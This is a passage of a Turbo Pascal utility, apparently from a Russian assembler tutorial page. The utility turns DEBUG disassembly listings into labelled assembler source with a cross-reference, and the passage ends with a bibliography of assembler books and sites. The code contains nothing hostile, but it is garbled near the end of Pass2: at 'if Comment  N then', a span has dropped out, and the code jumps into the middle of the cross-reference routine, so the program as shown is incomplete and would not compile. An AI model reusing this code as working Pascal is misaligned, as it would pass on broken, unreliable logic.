               SkipBT; if Stop then goto EndParseLine; 
               k := CharPos; 
               SkipUBTC; 
             (*  Operand1 := Copy(Line, k, CharPos-k); *) 
               Operand1[0] := Chr(CharPos-k); 
               Move(Line[k], Operand1[1], CharPos-k); 
             end; 
        'W': if Operand1 = 'WORD'  then begin 
               TypeOverride := W; 
               SkipBT; if Stop then goto EndParseLine; 
               SkipUBT; 
               SkipBT; if Stop then goto EndParseLine; 
               k := CharPos; 
               SkipUBTC; 
             (*  Operand1 := Copy(Line, k, CharPos-k); *) 
               Operand1[0] := Chr(CharPos-k); 
               Move(Line[k], Operand1[1], CharPos-k); 
             end; 
        'D': if Operand1 = 'DWORD' then begin 
               TypeOverride := D; 
               SkipBT; if Stop then goto EndParseLine; 
               SkipUBT; 
               SkipBT; if Stop then goto EndParseLine; 
               k := CharPos; 
               SkipUBTC; 
             (*  Operand1 := Copy(Line, k, CharPos-k); *) 
               Operand1[0] := Chr(CharPos-k); 
               Move(Line[k], Operand1[1], CharPos-k); 
             end; 
        'F': if Operand1 = 'FAR'   then begin 
               TypeOverride := F; 
               SkipBT; if Stop then goto EndParseLine; 
               k := CharPos; 
               SkipUBTC; 
             (*  Operand1 := Copy(Line, k, CharPos-k); *) 
               Operand1[0] := Chr(CharPos-k); 
               Move(Line[k], Operand1[1], CharPos-k); 
             end; 
        end; 
        SkipBTC; if Stop then goto EndParseLine; 
        (* second operand *) 
        k := CharPos; 
        SkipUBTC; 
      (*  Operand2 := Copy(Line, k, CharPos-k); *) 
        Operand2[0] := Chr(CharPos-k); 
        Move(Line[k], Operand2[1], CharPos-k); 
        (* check for type override operators *) 
        case Operand2[1] of 
        'B': if Operand2 = 'BYTE' then begin 
               TypeOverride := B; 
               SkipBT; if Stop then goto EndParseLine; 
               SkipUBT; 
               SkipBT; if Stop then goto EndParseLine; 
               k := CharPos; 
               SkipUBTC; 
             (*  Operand2 := Copy(Line, k, CharPos-k); *) 
               Operand2[0] := Chr(CharPos-k); 
               Move(Line[k], Operand2[1], CharPos-k); 
             end; 
        'W': if Operand2 = 'WORD'  then begin 
                TypeOverride := W; 
                SkipBT; if Stop then goto EndParseLine; 
                SkipUBT; 
                SkipBT; if Stop then goto EndParseLine; 
               k := CharPos; 
               SkipUBTC; 
             (*  Operand2 := Copy(Line, k, CharPos-k); *) 
               Operand2[0] := Chr(CharPos-k); 
               Move(Line[k], Operand2[1], CharPos-k); 
             end; 
        'D': if Operand2 = 'DWORD' then begin 
                TypeOverride := D; 
                SkipBT; if Stop then goto EndParseLine; 
                SkipUBT; 
                SkipBT; if Stop then goto EndParseLine; 
               k := CharPos; 
               SkipUBTC; 
             (*  Operand2 := Copy(Line, k, CharPos-k); *) 
               Operand2[0] := Chr(CharPos-k); 
               Move(Line[k], Operand2[1], CharPos-k); 
             end; 
        'F': if Operand2 = 'FAR'   then begin 
               TypeOverride := F; 
               SkipBT; if Stop then goto EndParseLine; 
               k := CharPos; 
               SkipUBTC; 
             (*  Operand2 := Copy(Line, k, CharPos-k); *) 
               Operand2[0] := Chr(CharPos-k); 
               Move(Line[k], Operand2[1], CharPos-k); 
             end 
        end 
      end; 
    EndParseLine: end; 
  procedure Pass1; 
  var 
    _Offset, 
    _Label, _Mem, 
    Status         : INTEGER; 
  function OperandType(var Operand: STR12): ReferenceTypes; 
  begin 
    case Operand[2] of 
     'X': case Operand[1] of 
            'A': OperandType := W; 
            'B': OperandType := W; 
            'C': OperandType := W; 
            'D': OperandType := W 
          end; 
    'S':  case Operand[1] of 
            'C': OperandType := W; 
            'D': OperandType := W; 
            'E': OperandType := W; 
            'S': OperandType := W 
          end; 
    'L': case Operand[1] of 
           'A': OperandType := B; 
           'B': OperandType := B; 
           'C': OperandType := B; 
           'D': OperandType := B 
         end; 
    'H': case Operand[1] of 
           'A': OperandType := B; 
           'B': OperandType := B; 
           'C': OperandType := B; 
           'D': OperandType := B 
         end; 
    'I': case Operand[1] of 
           'S': OperandType := W; 
           'D': OperandType := W 
         end; 
    'P': case Operand[1] of 
           'B': OperandType := W; 
           'S': OperandType := W 
         end 
   end (* case *) 
  end; 
  procedure MemoryOperand(var Operand, OperandX: STR12; Position: BYTE; 
                                                 ExplicitType: 
ReferenceTypes); 
  begin 
    if (Ord(Operand[0])=6) then begin 
     if (Operand[1] = '[') AND (Operand[6] = ']') then begin 
       Val ( '$'+Copy(Operand, 2, 4), _Mem, Status); 
       if Status = 0 then begin (* valid 4 digit hex number *) 
         case ExplicitType of 
           N: ExplicitType := W; (* indirect jump or call *) 
           F: ExplicitType := D  (* far indirect jump or call *) 
         end; 
         if (ExplicitType <> None) then 
           StoreReference (_Offset, _Mem, ExplicitType, Position) 
         else 
           StoreReference (_Offset, _Mem, OperandType(OperandX), Position); 
       end  (* valid memory operand *) 
     end   (* [,] *) 
    end  (* length = 6 *) 
  end; 
  begin (* Pass 1 *) 
    gotoXY(1,25); Write('Pass 1  , Line '); 
    LineCount := 0; 
    while NOT EOF(f_in) do begin 
      readln(f_in, Line); 
      LineCount := succ(LineCount); 
      if (LineCount and $000F) = 0 then begin 
         gotoXY(16,25); 
         write(LineCount:3) 
      end; 
      ParseLine(ParsedLine); 
      with ParsedLine do begin 
         (**** 
           gotoxy(12,wherey);writeln(offset,'|','|',opcode,'|', 
                                   operand1,'|',operand2,'|'); 
          ****) 
        Val ( '$'+Offset, _Offset, Status); 
        if Status = 0 then begin 
         Status := -1; 
         (* check for opcodes with CODE_LABEL operands *) 
         case OpCode[1] of 
            'J': begin 
                   Val ( '$'+Operand1, _Label, Status); 
                   if Status <> 0 then begin 
                     if (OpCode = 'JMP') AND (TypeOverride=None) then 
                       TypeOverride := N;   (* try indirect NEAR jump *) 
                   end 
                 end; 
            'C': if OpCode = 'CALL' then begin 
                   Val ( '$'+Operand1, _Label, Status); 
                   if (Status <> 0) AND (Operand1[5]=':') then begin 
                     Val('$'+Copy(Operand1, 6, 4), _Label, Status); 
                     if Status = 0 then StoreReference (_Offset, _Label, F, 
1); 
                     Status := -1; 
                   end 
                 end; 
            'L': if (OpCode = 'LOOP')  OR 
                    (OpCode = 'LOOPZ') OR (OpCode = 'LOOPNZ') 
                   then Val ( '$'+Operand1, _Label, Status); 
            'P': if OpCode = 'PUSH' then TypeOverride := W 
                 else if OpCode = 'POP' then TypeOverride := W; 
         end (* case *); 
         if Status = 0 then begin (* valid near label *) 
           StoreReference (_Offset, _Label, N, 1) 
         end; 
         MemoryOperand(Operand1, Operand2, 1, TypeOverride); 
         MemoryOperand(Operand2, Operand1, 2, TypeOverride); 
        end (* valid offset *) 
      end (* with ParsedLine *) 
    end (* while *); 
    gotoXY(16,25); write(LineCount:3); 
  end (* Pass 1 *); 
  procedure Pass2; 
  type 
    PrefixTypes = (NoPrefix, REP, REPZ, REPNZ, LOCK, CS, DS, ES, SS); 
  var 
    k, _Offset, 
    NextOffset, 
    NextRef, 
    Status      : INTEGER; 
    Prefix      : PrefixTypes; 
    ASMLine     : STR80; 
  function TestPrefix: BOOLEAN; 
  var 
    HexByte, Status: INTEGER; 
  begin 
    case ParsedLine.OpCode[3] of  (* test for prefix opcodes *) 
      ':', 'P', 'C' : begin 
          Val('$'+ParsedLine.HexCode, HexByte, Status); 
          case HexByte of 
           $2E: begin Prefix := CS;    TestPrefix := true end; 
           $26: begin Prefix := ES;    TestPrefix := true end; 
           $3E: begin Prefix := DS;    TestPrefix := true end; 
           $36: begin Prefix := SS;    TestPrefix := true end; 
           $F2: begin Prefix := REPNZ; TestPrefix := true end; 
           $F3: begin Prefix := REPZ;  TestPrefix := true end; 
           $F0: begin Prefix := LOCK;  TestPrefix := true end; 
           else TestPrefix := false 
          end 
      end 
      else TestPrefix := false 
    end; 
  end; 
  begin (* Pass 2 *) 
    gotoXY(1,25); Write('Pass 2  , Line '); 
    NextOffset := 0; 
    NextRef := 0; 
    Prefix := NoPrefix; 
    LineCount := 0; 
    while NOT EOF(f_in) do begin 
      readln(f_in, Line); 
      LineCount := succ(LineCount); 
      if (LineCount and $000F) = 0 then begin 
         gotoXY(16,25); 
         write(LineCount:3) 
      end; 
      ParseLine(ParsedLine); 
      if NOT TestPrefix then begin 
        with ParsedLine do begin 
          if (Prefix = REPZ) OR (Prefix = REPNZ) then begin 
            if (Opcode[1] IN ['M', 'L', 'S']) AND (Ord(OpCode[0])<>0) then 
              Prefix := REP 
          end; 
        Val ( '$'+Offset, _Offset, Status); 
        if Status = 0 then begin 
         if _Offset = SymbolTable[NextOffset].offset then begin 
           case SymbolTable[NextOffset].reftype of 
             N:     begin 
                      Move(Operand1[1], Operand1[3], 4); 
                      Operand1[0] := succ(succ(Operand1[0])); 
                      Operand1[1] := 'L'; 
                      Operand1[2] := '_'; 
                    end; 
             B,W,D: begin 
                      if SymbolTable[NextOffset].position = 1 then begin 
                        Operand1[1] := 'V'; 
                        Operand1[6] := '_'; 
                      end else begin 
                        Operand2[1] := 'V'; 
                        Operand2[6] := '_'; 
                      end 
                    end; 
           end; 
           NextOffset := succ(NextOffset); 
         end; 
         while AuxTable[NextRef].reference < _Offset do 
            NextRef := succ(NextRef); 
         while _Offset = AuxTable[NextRef].reference do begin 
           case AuxTable[NextRef].reftype of 
             N:     begin 
                      Writeln(f_out, '  L_'+ Offset+':'); 
                    end; 
             B:     begin 
                      Writeln(f_out, '  V_'+ Offset+tab+'DB', tab, '?'); 
                    end; 
             W:     begin 
                      Writeln(f_out, '  V_'+ Offset+tab+'DW', tab, '?'); 
                    end; 
             D:     begin 
                      Writeln(f_out, '  V_'+ Offset+tab+'DD', tab, '?'); 
                    end; 
           end; 
           repeat NextRef:=succ(NextRef) 
           until (AuxTable[NextRef].reftype <> AuxTable[NextRef-1].reftype) 
OR 
                 (_Offset <> AuxTable[NextRef].reference) OR 
                 (NextRef >= Symbol_Table_Length); 
         end; 
         if Offset[0] <> Chr(0) then begin 
         write(f_out, tab, tab); 
         case Prefix of 
          REP:  begin 
                  write(f_out, 'REP '); 
                  Prefix := NoPrefix 
                end; 
          REPZ: begin 
                  write(f_out, 'REPZ '); 
                  Prefix := NoPrefix 
                end; 
          REPNZ:begin 
                  write(f_out, 'REPNZ '); 
                  Prefix := NoPrefix 
                end; 
          LOCK: begin 
                  write(f_out, 'LOCK '); 
                  Prefix := NoPrefix 
                end; 
         end; 
         write(f_out, OpCode, tab); 
         if Ord(Operand1[0]) > 2 then begin 
           case TypeOverride of 
            None: ; 
            B   : write(f_out, 'BYTE PTR '); 
            W   : write(f_out, 'WORD PTR '); 
            D   : write(f_out, 'DWORD PTR '); 
            F   : write(f_out, 'FAR PTR '); 
           end; 
           case Prefix of 
             NoPrefix: ; 
              CS: begin write(f_out, 'CS:'); Prefix := NoPrefix end; 
              ES: begin write(f_out, 'ES:'); Prefix := NoPrefix end; 
              SS: begin write(f_out, 'SS:'); Prefix := NoPrefix end; 
              DS: begin write(f_out, 'DS:'); Prefix := NoPrefix end; 
           end; 
         end; 
         write(f_out, Operand1); 
         if Operand2[0]<>Chr(0) then begin 
             write(f_out, ', '); 
         if Ord(Operand2[0]) > 2 then begin 
           case TypeOverride of 
            None: ; 
            B   : write(f_out, 'BYTE PTR '); 
            W   : write(f_out, 'WORD PTR '); 
            D   : write(f_out, 'DWORD PTR '); 
            F   : write(f_out, 'FAR PTR '); 
           end; 
           case Prefix of 
            NoPrefix: ; 
              CS: begin write(f_out, 'CS:'); Prefix := NoPrefix end; 
              ES: begin write(f_out, 'ES:'); Prefix := NoPrefix end; 
              SS: begin write(f_out, 'SS:'); Prefix := NoPrefix end; 
              DS: begin write(f_out, 'DS:'); Prefix := NoPrefix end; 
           end; 
         end; 
             write(f_out, Operand2); 
         end 
         else write(f_out, tab); 
         end; 
         if Comment  N then begin 
            HexString(RefStr, AuxTable[CharPos].offset); 
            if k = 5 then begin 
                            k:=0; 
                            writeln(f_out); 
                            write(f_out, tab,tab,tab,tab, '; R_', RefStr) 
end 
                     else write(f_out, ' ,R_', RefStr); 
            k := succ(k) 
          end; 
          CharPos:= succ(CharPos) 
        end; 
        if reftype <> N then writeln(f_out); 
      end; 
    end; 
    writeln(f_out); 
  end; 
begin 
  rep[none]:='NONE'; 
  rep[B]:='BYTE';rep[W]:='WORD';rep[D]:='DWORD'; 
  rep[N]:='NEAR';rep[F]:='FAR'; 
  Current_SymbolTable_Index:= 0; 
  write('Enter filename: '); readln(FileName); 
  FileExt := false; 
  for CharPos:=1 to Length(FileName) do FileExt := FileName[CharPos] = '.'; 
  if FileExt then assign(f_in, FileName) 
             else assign(f_in, FileName+'.DEB'); 
  (* start pass 1 *) 
  reset(f_in); 
  Pass1; 
  Symbol_Table_Length := Current_SymbolTable_Index; 
  Current_SymbolTable_Index := 0; 
  Writeln; 
  Writeln(Symbol_Table_Length, ' symbols'); 
  (* Sort symboltable *) 
  SortInputIndex := 0; 
  SortOutputIndex := 0; 
  Writeln('Sorting symboltable ...'); 
  SortStatus := TurboSort(SizeOf(TableEntry)); 
  if SortStatus <> 0 then writeln('Error ', SortStatus:2, ' during 
sorting'); 
  if FileExt then begin 
    CharPos:= 1; 
    while FileName[CharPos] <> '.' do CharPos:= succ(CharPos); 
    FileName := copy(FileName, 1, pred(CharPos)); 
  end; 
  assign(f_out, FileName+'.DBO'); 
  rewrite(f_out); 
  Writeln('Writing cross-reference'); 
  CrossRefList; 
  (* start pass 2 *) 
  reset(f_in); 
  Pass2; 
  close(f_out); 
  close(f_in) 
end. 
-------------------- end -------------- 
                                 Литература. 
        Питер  Абель   «АССЕМБЛЕР   И   ПРОГРАММИРОВАНИЕ   ДЛЯ   IBM   PC». 
        Технологический институт Британская Колумбия. 
      2.  В.И.Юров «Assembler (практикум и пособие)». Изд. Питер. 
               Москва.2002. 
          3.  А.А. Абдукодиров «IBM PC АССЕМБЛЕРИДА ПРОГРАММАЛАШ 
           АСОСЛАРИ» Университет 1998. 
          4.  Р.Браун. «Справочник по прерываниям IBM PC» Москва, 
               издательство "Мир", 1994. 
          5.  Р.Джордейн «Справочник программиста персональных компьютеров 
        типа IBM PC, XT и AT». Москва, "Фин. и статистика" 1992. 
     6. И.В.Юров «Справочная система по языку ассемблера  IBM  PC».  СПВУРЭ 
        ПВО. 2000. 
     7. Интернет сайты: 
           www.ilf.net 
           home1.gte.net/rdhaar/hotbox/ 
           www.agate.net/~krees/ 
           www.cdc.net/~x/ 
           www.chibacity.com/chiba/ 
           www.conexis.es/~amasso/ 
         www.virewall.narod.ru/vir.html 
           www.etu.net.ru 
           www.ruler.h1.ru/asm/abel/ 
           www.google.com/search/asm 
           www.hangup.da.ru/ 
           www.home.pages.at/rolik/ 
           www.bib.ru 
Страницы: 1, 2, 3 
	
	
					
							 |